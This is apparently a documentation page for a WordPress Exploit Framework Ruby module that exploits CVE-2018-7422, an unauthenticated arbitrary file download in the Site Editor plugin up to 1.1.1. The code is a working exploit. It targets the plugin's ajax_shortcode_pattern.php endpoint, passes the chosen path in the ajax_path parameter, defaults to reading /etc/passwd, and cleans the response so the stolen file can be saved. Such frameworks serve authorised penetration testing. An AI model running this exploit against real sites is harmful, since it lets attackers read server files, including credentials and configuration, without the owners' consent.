class Wpxf::Auxiliary::SiteEditorFileDownload
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 6
# Registers the module metadata for the Site Editor <= 1.1.1 arbitrary file
# download (CVE-2018-7422, WPVDB 9044). The superclass initializer runs
# first; the descriptor is then handed to +update_info+.
def initialize
  super

  # Kept as named data so the credits and references read at a glance.
  credits = [
    'Nicolas Buzy-Debat', # Disclosure
    'rastating'           # WPXF module
  ]
  advisories = [
    ['CVE', '2018-7422'],
    ['WPVDB', '9044']
  ]

  # "non-PHP" matters operationally: the description implies the endpoint
  # executes PHP sources instead of returning them, so requesting a .php
  # file presumably yields no usable content (confirm against the plugin).
  update_info(
    name: 'Site Editor <= 1.1.1 File Download',
    desc: %(
      This module exploits a vulnerability which allows you to download any
      non-PHP file accessible by the user the web server is running as.
    ),
    author: credits,
    references: advisories,
    date: 'Mar 16 2018'
  )
end
Public Instance Methods
check()
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 28
# Vulnerability check: compares the plugin version advertised in its
# readme against the first fixed release (1.1.2). The comparison and the
# readme fetch are delegated to the framework helper, so this only tells
# you the version string looks vulnerable, not that the endpoint is live.
def check
  plugin_slug = 'site-editor'
  fixed_in = '1.1.2'
  check_plugin_version_from_readme(plugin_slug, fixed_in)
end
default_remote_file_path()
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 32
# Default target when the operator does not set one: the system password
# database, the usual low-risk proof that arbitrary reads work. An absolute
# path is used so the result does not depend on the endpoint's working
# directory.
def default_remote_file_path
  File.join('/etc', 'passwd')
end
download_request_params()
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 50
# Request parameters for the download: the vulnerable endpoint reads the
# target path from +ajax_path+. The value is the operator-supplied
# +remote_file+; any URL encoding is presumably done by the framework's
# request layer, not here.
def download_request_params
  params = {}
  params['ajax_path'] = remote_file
  params
end
downloader_url()
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 40
# URL of the vulnerable script, addressed directly under the plugin
# directory rather than through a WordPress AJAX action — no credentials
# are supplied anywhere in this module, so the request is presumably
# unauthenticated. +normalize_uri+ joins the segments.
def downloader_url
  script_path = %w[site-editor editor extensions pagebuilder includes ajax_shortcode_pattern.php]
  normalize_uri(wordpress_url_plugins, *script_path)
end
validate_content(content)
Calls superclass method
Wpxf::WordPress::FileDownload#validate_content
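# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 44
# Strips the endpoint's JSON envelope from the response and writes the
# remaining bytes to +downloaded_filename+ before deferring to the
# superclass validation.
#
# The envelope ({"success":true,"data":{"output":[]}}) is emitted by the
# vulnerable script after the requested file's contents, so it has to be
# removed from the tail of the body. The anchor is \z (true end of string,
# with optional trailing whitespace/newlines allowed before it) rather
# than $: in Ruby, $ matches at the end of *every* line, so the original
# pattern would also delete the same literal wherever it ended a line
# inside the downloaded file, silently corrupting the artifact.
def validate_content(content)
  File.write(downloaded_filename, strip_response_trailer(content))
  super
end

private

# Removes the trailing JSON envelope (plus any whitespace after it) from
# +content+; a body without the envelope is returned unchanged.
def strip_response_trailer(content)
  trailer = /\{"success":true,"data":\{"output":\[\]\}\}\s*\z/
  content.gsub(trailer, '')
end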
working_directory()
# File lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb, line 36
# Directory (relative to the WordPress root, trailing slash included) that
# the vulnerable script lives in. Presumably this is where a relative
# +remote_file+ would be resolved from by the endpoint — confirm before
# relying on it; the default target is absolute for that reason.
def working_directory
  File.join('wp-content', 'plugins', 'site-editor', 'editor', 'extensions', 'pagebuilder', 'includes', '')
end